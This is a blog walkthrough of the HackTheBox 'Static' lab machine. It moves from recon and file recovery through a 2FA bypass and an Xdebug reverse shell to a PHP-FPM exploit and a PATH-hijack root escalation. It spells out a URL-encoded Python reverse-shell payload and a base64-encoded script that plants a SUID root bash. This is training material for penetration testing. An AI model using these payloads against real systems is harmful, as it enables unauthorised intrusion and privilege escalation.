Hackthebox: Static Machine (Linux) Walkthrough – Hard Difficulty

Written by darknite -
on December 19, 2021

In this post, I would like to share a walkthrough of the Static Machine.

This room has been considered difficulty rated as a Hard machine

Testing

Information Gathering on Static Machine

Once we have started the VPN connection, we can start information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

From the result, we got a few ports open such as:

  • 21: vsftpd 3.0.3
  • 22: OpenSSH 8.2p1
  • 80: gunicorn

Let’s access the website interface such as static.htb:8080/.ftp_uploads/

There are two files that we can see over here

When I try to open warning.txt

We will need to download and save the db.sql.gz onto our machine and try to look at what has stored inside the file

Sadly, the file has been corrupted just been mentioned on warning.txt

Let’s do some research on how to recover the file on the internet

The result of the research didn’t show anything useful for now. Let’s scroll down and hope that we can find any useful tools to use

We managed to find a tool called gzrecover on GitHub.

Gaining Privileges Access on Static machine

The tools can be downloaded over here

Once the gzrocover is fully installed, we can run it by using the command sudo ./gzrecover db.sql.gz

We managed to recover the file and let’s read the file that has been recovered

However, the file contains some encrypted code but it’s obvious that it shows some MySQL commands. After decrypting the file, you will find out that there are credentials saved there.

  • username=admin
  • password=admin

Trying to bypass 2FA authentication

We notice that static.htb:8080 has a directory such as /vpn/ from our nmap result.

I found out that login.php is running on /vpn/ directory which lead to a login page

Once you have entered the credentials on the login page, it will redirect to 2FA Enabled page that looks something such as shown above

We will need to bypass the 2FA Enabled by running the command above.

It will show an Internal IT Support portal where you need to generate any name so a new VPN will be downloaded on your machine

Downloading openvpn

From the vpn file, I notice there’s another subdomain such as vpn.static.htb been written there.

Let’s the vpn that we have downloaded previously

We should be re-route the OpenVPN’s IP to 172.20.0.0/24

We should be able to access the URL 172.20.0.10 which contains the info.php file stored over there.

Let’s start our NC listener on our machine

We should be starting the exploit by running python2 exploit.py

## I have renamed the python file to exploit.py ##

I have tried the command as above but nothing happen on my nc listener

It works on this payload though

After entering the reverse shell payload, you should access the website 172.20.0.10/info.php?XDEBUG_SESSION_START=phpstorm

Voila! As a result, we got the reverse shell connection back to us.

Finally, we should be able to read the user flag by typing “cat user.txt

Escalate to Root Privileges Access

However, we need to transfer ncat from your machine to the victim’s machine

We should execute the port forwarding by executing the command ssh -N -L <anyport>:192.168.254.3:80 -i id_rsa www-data@172.20.0.10

Next, we need to exploit it by using the command ./phuip-fpizdam http://local:<anyport>/index.php

Therefore, we need to execute the command below on your browser

localhost:<anyport>/index.php?a=/usr/bin/python3.6%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.254.2%22%2C4242))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bimport%20pty%3B%20pty.spawn(%22%2Fbin%2Fbash%22)%27%0A

Finally, we managed to get the reverse shell connection back to us

Let’s execute the following the command 

echo 'IyEvYmluL2Jhc2gKL2Jpbi9jcCAvYmluL2Jhc2ggL3RtcC9iYXNoIC0tbm8tcHJlc2VydmU9YWxsCi9iaW4vY2hvd24gcm9vdDpyb290IC90bXAvYmFzaAovYmluL2NobW9kIDQ3NzcgL3RtcC9iYXNoCg==' | base64 -d > /tmp/readlink

After that, we should rename the readlink file into sed (it shouldn’t matter about the naming)

Once you have renamed the file, we need to execute the export PATH=/tmp:$PATH before we proceed with the next step

Once that has been done, we can now execute the following command:

  • /usr/bin/ersatool
  • create
  • x
  • enter
  • exit

At last, we should be able to see the bash file on the /tmp/ directory

Next step, we need to execute the bash -p command on /tmp/ directory

Finally, we should be able to read the root flag by running the “cat /root/root.txt” command

Categories:

Hard Machine

Tags:

2FAbase64Challengesdata recoveryersatoolForensicgunicorngzrecoverHackTheBoxLinuxMySQLPenetration Testingphpinfoport forwardingPythonsshSSH keyVPNvsftpd

No responses yet

Leave a Reply

Your email address will not be published. Required fields are marked *